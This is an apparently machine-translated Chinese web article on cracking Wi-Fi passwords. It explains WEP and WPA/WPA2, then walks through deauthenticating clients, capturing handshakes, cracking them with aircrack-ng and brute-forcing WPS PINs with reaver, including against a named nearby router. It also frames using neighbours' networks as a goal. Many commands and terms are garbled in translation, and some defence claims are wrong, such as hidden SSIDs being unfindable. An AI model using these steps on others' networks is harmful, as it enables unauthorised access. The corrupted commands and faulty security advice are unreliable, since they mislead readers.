最近這段時(shí)間總有小伙伴問小編破解無線網(wǎng)絡(luò)密碼(無線WiFi網(wǎng)絡(luò)的密碼破解攻防及原理詳解) 是什么,小編為此在網(wǎng)上搜尋了一些有關(guān)于破解無線網(wǎng)絡(luò)密碼(無線WiFi網(wǎng)絡(luò)的密碼破解攻防及原理詳解) 的知識(shí)送給大家,希望能解答各位小伙伴的疑惑。
破解無線 *** 密碼(無線WiFi *** 攻防及密碼破解原理詳解)
(相關(guān)資料圖)
大家應(yīng)該都有過這樣的經(jīng)歷,就是自己的無線 *** 怎么感覺變慢了?“有人蹭我家 *** 了嗎?”“有時(shí)候,我們出門也想試試蹭別人的網(wǎng)。”在這里,“蹭網(wǎng)”的前提是破解對(duì)方的“無線密碼”。那么,這個(gè)“無線密碼”到底安全不安全?技術(shù)原理是什么?應(yīng)該如何防止別人「上網(wǎng)」?
今天我們就以這篇文章的內(nèi)容來梳理一下“無線WiFi *** 中密碼破解的攻擊、防御和原理”!
這里用無線路由器的WiFi加密來解釋。
目前無線路由器中的加密方式主要有WEP、WPA-PSK(TKIP)、WPA2-PSK(AES)和WPA-PSK(TKIP)+WPA2-PSK(AES)。
1.WEP(有線等效加密)(容易破解)
WEP是WiredEquivalentPrivacy的縮寫,是802.11b標(biāo)準(zhǔn)中定義的無線局域網(wǎng)安全協(xié)議。WEP用于提供與有線lan相同的安全級(jí)別。局域網(wǎng)本來就比WLAN安全,因?yàn)榫钟蚓W(wǎng)的物理結(jié)構(gòu)有保護(hù),部分或全部埋在樓里的 *** 也能防止未經(jīng)授權(quán)的訪問。通過無線電波的WLAN沒有相同的物理結(jié)構(gòu),因此它們?nèi)菀资艿焦艉透蓴_。WEP的目標(biāo)是通過加密無線電波中的數(shù)據(jù)來提供安全性,就像端到端傳輸一樣。WEP功能使用rsa數(shù)據(jù)安全公司開發(fā)的rc4prng算法。如果您的無線基站支持MAC過濾,建議您將此功能與WEP配合使用(MAC過濾比加密安全得多)。雖然這個(gè)名字似乎是有線 *** 的一個(gè)安全選項(xiàng),但事實(shí)并非如此。WEP標(biāo)準(zhǔn)在無線 *** 早期就已經(jīng)建立,旨在成為WLAN必要的安全保護(hù)層,但WEP的表現(xiàn)無疑是非常令人失望的。其根源在于設(shè)計(jì)上的缺陷。在使用WEP的系統(tǒng)中,無線 *** 中傳輸?shù)臄?shù)據(jù)用隨機(jī)生成的密鑰加密。然而,WEP用來生成這些密鑰的方法很快被發(fā)現(xiàn)是可預(yù)測(cè)的,因此潛在的入侵者可以很容易地?cái)r截和破解這些密鑰。即使是中等水平的無線黑客,也能在兩到三分鐘內(nèi)快速破解WEP加密。IEEE802.11的動(dòng)態(tài)有線等效保密(WEP)模式是在20世紀(jì)90年代末設(shè)計(jì)的,當(dāng)時(shí)作為有效武器的強(qiáng)大加密技術(shù)受到美國出口的嚴(yán)格限制。由于擔(dān)心強(qiáng)大的加密算法被破解,無線 *** 產(chǎn)品被禁止出口。然而,僅僅兩年后,動(dòng)態(tài)有線等效隱私模型被發(fā)現(xiàn)存在嚴(yán)重缺陷。但是,上世紀(jì)90年代所犯的錯(cuò)誤不應(yīng)該被視為無線 *** 安全或IEEE802.11標(biāo)準(zhǔn)本身。無線 *** 行業(yè)等不及IEEE修改標(biāo)準(zhǔn)了,于是推出了動(dòng)態(tài)密鑰完整性協(xié)議TKIP(補(bǔ)丁版的動(dòng)態(tài)有線等價(jià)隱私)。雖然WEP已經(jīng)被證明是過時(shí)和低效的,但它仍然被當(dāng)今許多現(xiàn)代無線接入點(diǎn)和無線路由器中的加密模式所支持。而且,它仍然是個(gè)人或公司使用最多的加密方法之一。如果你用的是WEP加密,并且非常重視自己 *** 的安全性,以后盡量不要用WEP,因?yàn)檎娴牟皇呛馨踩?/p>
2.WPA-PSK(TKIP)(安全性更高,但也可能被破解)
一開始采用WEP(有線等效加密)作為無線 *** 的安全機(jī)制,后來發(fā)現(xiàn)WEP非常不安全。802.11組織開始制定新的安全標(biāo)準(zhǔn),也就是后來的802.11i協(xié)議。然而,從標(biāo)準(zhǔn)的制定到最終發(fā)布需要很長的時(shí)間,并且考慮到消費(fèi)者不會(huì)為了 *** 安全而放棄自己原有的無線設(shè)備,Wi-Fi聯(lián)盟在標(biāo)準(zhǔn)出臺(tái)前基于802.11i的草案開發(fā)了一個(gè)名為WPA(Wi-FiProctedAccess)的安全機(jī)制,該機(jī)制使用TKIP(temporal key integrity protocol)。它使用的加密算法是RC4在WEP中使用的加密算法,因此不需要修改原始無線設(shè)備的硬件。WPA針對(duì)WEP中存在的問題:IV太短,密鑰管理太簡單,對(duì)消息完整性沒有有效的保護(hù)。軟件升級(jí)提高了 *** 安全性。WPA為用戶提供了完整的認(rèn)證機(jī)制,AP根據(jù)用戶的認(rèn)證結(jié)果決定是否允許用戶接入無線 *** 。認(rèn)證成功后,每個(gè)接入用戶的加密密鑰可以根據(jù)多種方式(傳輸數(shù)據(jù)包的數(shù)量、用戶接入 *** 的時(shí)間等)動(dòng)態(tài)改變。).此外,用戶在無線中傳輸?shù)臄?shù)據(jù)包都經(jīng)過MIC編碼,以確保用戶數(shù)據(jù)不會(huì)被其他用戶更改。作為802.11i標(biāo)準(zhǔn)的子集,WPA的核心是IEEE802.1x和TKIP(臨時(shí)密鑰完整性協(xié)議)。WPA考慮到了不同的用戶和不同的應(yīng)用安全需求,比如:企業(yè)用戶需要高安全保護(hù)(企業(yè)級(jí)),否則可能會(huì)泄露非常重要的商業(yè)秘密;然而,家庭用戶通常只使用 *** 瀏覽互聯(lián)網(wǎng)、收發(fā)電子郵件、打印和共享文件。這些用戶對(duì)安全性的要求相對(duì)較低。為了滿足不同安全需求用戶的需求,WPA規(guī)定了兩種應(yīng)用模式:企業(yè)模式和家庭模式(包括小型辦公室)。根據(jù)這兩種不同的應(yīng)用模式,有兩種不同的WPA認(rèn)證方式。對(duì)于大型企業(yè)的應(yīng)用,往往采用“802.1x+EAP”,用戶提供認(rèn)證所需的憑證。但是對(duì)于一些中小型的企業(yè)網(wǎng)或者家庭用戶,WPA也提供了一種簡化的模式,不需要專門的認(rèn)證服務(wù)器。這種模式被稱為“WPA預(yù)共享密鑰(WPA-PSK)”,只需要在每個(gè)WLAN節(jié)點(diǎn)(AP、無線路由器、網(wǎng)卡等)預(yù)先輸入一個(gè)密鑰就可以實(shí)現(xiàn)。).該密鑰僅用于認(rèn)證過程,不用于傳輸數(shù)據(jù)的加密。數(shù)據(jù)的加密密鑰是認(rèn)證成功后動(dòng)態(tài)生成的,系統(tǒng)會(huì)保證“一戶一密”,不存在像WEP那樣全網(wǎng)共享一個(gè)加密密鑰的情況,系統(tǒng)的安全性大大提高。
3.WPA2-PSK(AES)(安全性更高,更難破解)
802.11i頒布后,Wi-Fi聯(lián)盟推出了WPA2,它支持AES(高級(jí)加密算法),所以需要新的硬件支持,它使用的是CCMP(計(jì)數(shù)器模式密碼區(qū)塊鏈消息完整碼協(xié)議)。在WPA/WPA2中,PTK的生成依賴于PMK,PMK可以通過兩種方式獲得。一種是PSK的形式,即預(yù)共享密鑰,其中PMK=PSK,另一種是認(rèn)證服務(wù)器和站點(diǎn)需要協(xié)商生成PMK。IEEE802.11制定技術(shù)標(biāo)準(zhǔn),Wi-Fi聯(lián)盟制定商業(yè)標(biāo)準(zhǔn),Wi-Fi制定的商業(yè)標(biāo)準(zhǔn)基本符合IEEE制定的技術(shù)標(biāo)準(zhǔn)。WPA(Wi-FiProtectedAccess)其實(shí)是Wi-Fi聯(lián)盟制定的安全標(biāo)準(zhǔn)。商業(yè)標(biāo)準(zhǔn)的存在是為了支持IEEE802.11i,這是一種面向技術(shù)的安全標(biāo)準(zhǔn)。WPA2實(shí)際上是WPA的第二個(gè)版本。WPA之所以有兩個(gè)版本,在于Wi-Fi聯(lián)盟的商業(yè)運(yùn)作。我們知道802.11i任務(wù)組的目的是建立一個(gè)更安全的無線局域網(wǎng),所以在加密項(xiàng)目中標(biāo)準(zhǔn)化了兩個(gè)新的安全加密協(xié)議——TKIP和CCMP(一些無線 *** 設(shè)備將會(huì)用AES和AES-CCMP取代CCMP)。雖然TKIP對(duì)WEP的弱點(diǎn)做了很大的改進(jìn),但是保留了RC4算法和基本架構(gòu),暗示TKIP也有RC4本身暗示的弱點(diǎn)。因此,802.11i將創(chuàng)建一個(gè)全新的加密協(xié)議——CCMP,它更安全,更適合無線局域網(wǎng)環(huán)境。所以TKIP已經(jīng)在CCMP準(zhǔn)備好之前完成了。然而,在CCMP完成后,發(fā)布完整的IEEE802.11i標(biāo)準(zhǔn)可能需要一些時(shí)間。為了確保新的安全標(biāo)準(zhǔn)能夠盡快部署,Wi-Fi聯(lián)盟可以打消用戶對(duì)WLAN安全性的疑慮,從而使WLAN的市場(chǎng)迅速擴(kuò)大。因此,已經(jīng)完成TKIP的IEEE802.11i草案3被用作基準(zhǔn)。在IEEE完成并發(fā)布IEEE802.11i無線局域網(wǎng)安全標(biāo)準(zhǔn)后,Wi-Fi聯(lián)盟也立即發(fā)布了WPA第2版(WPA2)。Wpa = IEEE 802.11i草案3 = IEEE 802.1x/EAP+WEP(可選項(xiàng)目)/TKIP WPA2 = IEEE 802.11 I = IEEE 802.1 x/EAP+WEP(可選項(xiàng)目)/TKIP/CCMP
4.最后一種加密模式是WPA-PSK(TKIP)+WPA2-PSK(AES),是目前無線路由中更高的加密模式。目前這種加密方式因?yàn)榧嫒菪詥栴}還沒有被很多用戶使用。目前,最廣泛使用的加密模式是WPA-PSK(TKIP)和WPA2-PSK(AES)。相信加密無線 *** 一定能讓我們的用戶安心上網(wǎng)。所以這種方法安全性高,但由于兼容性問題,沒有得到廣泛應(yīng)用。
1.不需要任何技術(shù)破解手段,利用手機(jī)上的“WiFi萬能鑰匙”等軟件上網(wǎng)。
2.在捕捉到客戶端與目標(biāo)WiFi的握手后,實(shí)施基于密碼字典的暴力破解。成功率取決于目標(biāo)WiFi的密碼強(qiáng)度,字典的大小或準(zhǔn)確性,以及爆破機(jī)的計(jì)算性能。
3.在開啟wps功能的WiFi中,使用pin碼猜測(cè)法獲取WiFi密碼。
1.“WiFi萬能鑰匙”App的真正原理是收集用戶手機(jī)上成功連接的WiFi賬號(hào)和密碼,上傳并存儲(chǔ)在App的服務(wù)器上。當(dāng)附近上網(wǎng)用戶搜索同一 *** 時(shí),App可以根據(jù)附近熱點(diǎn)的配置信息,自動(dòng)匹配并從服務(wù)器獲取相應(yīng)密碼,通過數(shù)據(jù)流量發(fā)送到手機(jī)上,從而完成WiFi聯(lián)網(wǎng)。
2.暴力破解原理
普通無線路由器一般使用wpa、wpa2或wep作為加密方式。wep因?yàn)樘话踩菀妆黄平猓诂F(xiàn)有的無線路由器上已經(jīng)基本取消。所以我們搜到的要斷掉的WiFi基本都是wpa或者wpa2加密的。至于wpa認(rèn)證使用認(rèn)證服務(wù)器(如radius等。),在個(gè)人無線WiFi領(lǐng)域基本是不可能的,所以通常我們能搜索到的待破解的WiFi都是基于本地密碼的wpa或者wpa2加密WiFi。
破解wpa和wpa2加密的WiFi *** 的基本原理一般來說,我們需要先在無線網(wǎng)卡監(jiān)控模式下收集目標(biāo)WiFi的信息,比如ssid(WiFi名稱)、BSSID(即目標(biāo)WiFi的無線路由器的mac)、連接的客戶端MAC、信號(hào)強(qiáng)度等信息。然后發(fā)送一個(gè)假的解除關(guān)聯(lián)數(shù)據(jù)包,強(qiáng)制連接WiFi的客戶端與WiFi斷開連接。重點(diǎn)是,斷開連接后,客戶端會(huì)嘗試再次發(fā)起連接到WiFi *** 。這時(shí)客戶端會(huì)發(fā)送一個(gè)帶有認(rèn)證密碼的數(shù)據(jù)包,請(qǐng)求重新連接WiFi。這個(gè)包通常被稱為握手包。這時(shí)候我們的攻擊機(jī)利用攻擊程序和無線網(wǎng)卡對(duì)這個(gè)握手包進(jìn)行監(jiān)控和捕獲。這個(gè)握手包里面有WiFi密碼,但是這個(gè)密碼是加密的,當(dāng)然。所以后續(xù)需要使用攻擊程序調(diào)用密碼字典并計(jì)算得到的BSSID、客戶端MAC等信息,不斷計(jì)算字典中的每一個(gè)密碼,直到有一個(gè)密碼使用wpa算法計(jì)算出一個(gè)與抓取的握手包一致的加密字符串。這是目標(biāo)WiFi的密碼。如果已經(jīng)統(tǒng)計(jì)了字典中的每一個(gè)密碼,仍然沒有一個(gè)與捕獲的握手包的加密字符串一致,那么它將無法破解,退出,并構(gòu)造新的字典,然后重試。
3.pin碼破解WiFi密碼
在早期的無線路由器中,wps功能是開啟的。簡單來說,這個(gè)功能就是為了方便設(shè)備連接WiFi而設(shè)置了一個(gè)8位純數(shù)字串,不用每次都輸入繁瑣的密碼。客戶端可以通過pin碼快速關(guān)聯(lián)路由器WiFi。wps的初衷是方便用戶連接WiFi,但卻成了破解WiFi最有效的手段,因?yàn)?位純pin碼只有1億種可能的組合,而由于最后一位是前7位的校驗(yàn)和,所以只需要猜前7位,就只有1000萬種可能的組合可以猜。而且由于發(fā)送pin碼是為了連接WiFi,pin的前四位的錯(cuò)誤內(nèi)容和后三位的錯(cuò)誤信息是不一樣的,所以你只需要猜測(cè)前四位,然后猜測(cè)前四位正確后的后三位,最后一位校驗(yàn)和終究是可以自動(dòng)計(jì)算出來的,所以實(shí)際操作中你最多只需要猜測(cè)10000+1000種組合。通常,我們每兩秒鐘嘗試一次pin,因此理論上,it WiFi需要長達(dá)六個(gè)小時(shí)來猜測(cè)目標(biāo)路由器的pin,然后獲得它。
需要注意的是,雖然pin碼破解WiFi被認(rèn)為是最有效的WiFi破解方式,但在實(shí)踐中并不容易實(shí)現(xiàn)。之一,由于pin碼不安全的問題已經(jīng)被無線路由器的廠商廣泛重視,如今購買的無線路由器的wps功能已經(jīng)基本取消。第二,在pin的過程中,需要不斷的發(fā)送pin碼給目的路由器嘗試,對(duì)方路由器還要返回響應(yīng)消息。有時(shí)候由于路由器本身的不穩(wěn)定或者路由器的性能問題,路由器在不知不覺中被我們的pin殺死,導(dǎo)致猜測(cè)無法繼續(xù)或者路由器在收到太多錯(cuò)誤的pin碼后會(huì)自動(dòng)休息一段時(shí)間,在此期間不會(huì)收到pin碼,導(dǎo)致對(duì)我們pin碼的猜測(cè)時(shí)間過長且無意義。
1.筆記本
2.USB無線網(wǎng)卡(必需)
3 .卡利系統(tǒng)
4.密碼字典
暴力破解法
什么是暴力破解?事實(shí)上,這意味著一個(gè)接一個(gè)地嘗試密碼,直到找到正確的密碼。
現(xiàn)在wifi一般加密如下:
1.WEP(有線等效加密)-采用WEP64位或128位數(shù)據(jù)加密。
2.WPA-PSK[TKIP]-使用預(yù)共享密鑰的WI-FI保護(hù)訪問,WPA-PSK標(biāo)準(zhǔn)加密技術(shù)和TKIP加密類型。
3.WPA-PSK[TKIP]+WPA2-PSK[AES]-允許客戶使用WPA-PSK[TKIP]或WPA2-PSK[AES]。
之一步
輸入kali,并在終端輸入以下內(nèi)容
艾爾蒙-ng
列出網(wǎng)卡信息
2.第二步
輸入:
airmon-ng啟動(dòng)wlan0
打開網(wǎng)卡監(jiān)控
您可以使用ifconfig命令來檢查網(wǎng)卡信息:
ifconfig
您可以看到網(wǎng)卡的名稱已經(jīng)更改
3.第三步
airodump-ng wlan0mon
掃描wifi信號(hào)
在這里,我用自己的wifi做實(shí)驗(yàn)。
第四步
從上圖可以看出
BSSID是50:3A:A0:33:B2:8C頻道(CH)是:2
輸入:
airodump-ng-w freedom-C2-–bssid 50:3A:A0:33:B2:8C WLAN 0 mon–忽略-負(fù)一
抓住離合器。
-c:指定頻道
-w:指定手拿包的存放位置或名稱,自由是后面要搶的手拿包的名稱。
- bssid:指定路由器的MAC。
第五步
打開另一個(gè)終端,輸入命令:
airplay-ng-deatu 10-a路由器MAC -c客戶端MAC
WLAN 0 mon –-忽略-負(fù)一
使用airplay-ng工具強(qiáng)制斷開連接wifi的設(shè)備,重新連接路由器抓取數(shù)據(jù)包。
–-deatu:指定要發(fā)送的反驗(yàn)證數(shù)據(jù)包的數(shù)量,或者-0( *** 數(shù)字0)可用于指定反驗(yàn)證數(shù)據(jù)包的數(shù)量。
-a:指定路由器的MAC。
-c:指定客戶端的MAC。
6.第六步
破解握手包
空氣裂縫-ng -a -w字典自由。帽子
-a1:指定WEP加密方法
-a2:指定WPA-PSk加密方法
字典:字典的名字
自由-*。帽子:握手包
這是我的wifi密碼
破解成功靠的是強(qiáng)大的字典和運(yùn)氣。
之一步
Wash會(huì)在WPS打開的情況下掃描 ***
wash -i wlan0mon [-C]
由于周圍沒有開啟WPS功能的wifi,所以會(huì)出現(xiàn)如上圖所示。這時(shí)候先別急,因?yàn)橛行┍容^隱蔽,所以直接來。
使用之前的命令掃描wifi:
airodump-ng wlan0mon
如果看到邊肖圈出來的MAC,選擇PWR絕對(duì)值小于70的wifi破解。
2.第二步
選擇一個(gè)路由器。
我這里選擇的是wifi,名稱:FAST_F70E。
他在那里:E4: D3: 32: 7f: F7: 0e-45 2006 54e。WPA2 CCMP PSK FAST _ F70e
然后,命令如下:
金甲蟲I mon 0-b E4:D3:32:7F:F7:0E-a-S-vv
E4:D3:32:7F:F7:0E此mac會(huì)根據(jù)路由器的mac進(jìn)行更改。我破解的wifi的mac是E4:D3:32:7F:F7:0E。
如圖,可以破解,開啟wps功能。
如上圖所示,表示無法破解。換一個(gè)wifi破解吧,孩子。
這意味著它裂了。
注意事項(xiàng):
如果密碼被更改,如果您知道他的wifi pin,請(qǐng)使用以下命令:discover-I mon 0-b MAC-p PIN
pin碼有8位數(shù):所以是10的8次方,要窮盡100000000次。
這個(gè)引腳也是有限制的。比如,要 *** 針的路由器必須開啟wps功能;好像現(xiàn)在很多都是防pin路由器或者300秒pin限制。
部分路由pin碼可以計(jì)算:騰達(dá)、雷科產(chǎn)品如果路由MAC地址以“C83A35”或“00B00C”開頭,可以直接計(jì)算PIN值。
比如這個(gè):BSSID:TENDA _ 579 a 18 MAC:C8:3A:35:57:9A:18。用計(jì)算器將MAC的后六位轉(zhuǎn)換成十進(jìn)制數(shù),得到5741080(pin碼的前七位)。最多試10次或者通過軟件獲得這個(gè)路由PIN碼!
破解時(shí)建議使用以下命令:
金甲蟲I mon 0-b E4:D3:32:7F:F7:0E-a-S–d9–T9-vv
因?yàn)楱C- d9-T9參數(shù)可以防止管腳殺死路由器。
1.可以設(shè)置復(fù)雜的密碼。密碼包含字符、符號(hào)和數(shù)字,長度設(shè)置為12位以上。無線密碼越復(fù)雜,對(duì)方越難破解。加密方法是WPA-PSK/WPA2-PSK。
2.隱藏您的無線 *** 名稱。
當(dāng)我們隱藏了無線認(rèn)證后,別人就找不到我們的 *** 連接點(diǎn)了,所以就連不上我們的 *** 了。單擊路由器頁面左上角的無線基本設(shè)置。在右側(cè),您可以看到有一個(gè)SSID服務(wù)廣播。去掉前面的勾號(hào),點(diǎn)擊下面的保存。可以隱藏?zé)o線信號(hào)。
3.設(shè)置白名單,開啟MAC地址過濾功能,手動(dòng)添加家庭上網(wǎng)設(shè)備的MAC地址。這時(shí)候即使有人破解了WIFI密碼,也無法上網(wǎng)。